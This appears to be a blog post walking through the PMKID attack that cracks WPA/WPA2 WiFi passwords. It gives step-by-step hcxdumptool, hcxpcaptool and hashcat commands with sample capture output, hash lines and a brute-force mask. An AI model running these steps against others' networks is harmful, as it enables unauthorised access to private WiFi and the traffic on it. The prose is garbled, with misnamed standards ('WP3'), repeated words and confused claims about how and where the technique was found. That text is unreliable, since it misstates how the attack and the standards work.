December 4, 2019

How is WPA-WPA2 Crack WiFi Network Passwords Enabled?

The new method for cracking WPA / WPA2 allowed the vulnerability of WiFi networks to pre-shared key-hash attackers using targeted victims ‘ passwords.

This technique was discovered during an attack against the recently released WPA3 security standard which is incredibly difficult to break since its current key setup protocol, the Simultaneous Authentication of Equals (SAE), is used.

Wi-Fi Alliance’s latest WP3 security model provides Wi-Fi protection in the next decade with new capabilities to improve both personal and corporate network and the current WP3 security standard that is a successor to WPA2.

Researcher finds this assault in the absence of EAPOL 4-way handshake that compromises the WPA / WPA2 code.

The new attack on a single EAPOL framework is conducted, as stated by Steube who is the developer of the Hashcat password cracking tool, on the RSN IE (Robust Security Network Information Element).

Further, this attack works Against all forms of 802.11i / p / q / r roaming networks and how many vendors and routers this strategy can run is not clear.

How Does WPA / WPA2 Password Password Work:

Robust Security Network Information Element (RSN IE) Work WPA / WPA2 WiFi Password Attack work in 802.11 management frames and is operated in the same EAPOL frame.

RSN IE can catch Pairwise Master Key ID (PMKID) whenever a user tries to authenticate with the router.

“Here we can see that the PMKID captured is calculated by HMAC-SHA1, with the PMK key and the data part as concatenation of a fixed string label” PMK Name, “MAC address of the point of access, and the station MAC address.”

To use this new attack, you need the following tools:

1. hcxdumptool v4.2.0 or higher
2. hcxtools v4.2.0 or higher
3. hashcat v4.2.0 or higher

Step 1

Run hcxdumptool to get AP PMKID, and dump the folder with the following code in PCAP format.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

The output looks like this:

start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2

Run the following tool, called hcxpcaptool, to transform recorded data from the pcapng format into hash-coded formats.

$ ./hcxpcaptool -z test.16800 test.pcapng

The content of the written file will look like this and it split into 4 columns.

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

Also, Researcher recommends that, While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.

-E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3

Eventually, run hashcat, we need the PMKID-16800 hash mode, and like any other hash form, we can use the following code.

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Finally, it cracked the hash WPA-PMKID-PBKDF2

When we look at previously available WiFi attacks, we have to sit back and wait until the target user is paired, we can crack the key by catching the four-way handshake.

To have access to the PMKID, this new attack just needs to try to authenticate into the wireless network later on.

However, this approach is much easier to access the hash containing the pre-shared key and the hash later will be broken, which is also little difficult due to the complexity of the code.

Leave a Reply

Your email address will not be published. Required fields are marked *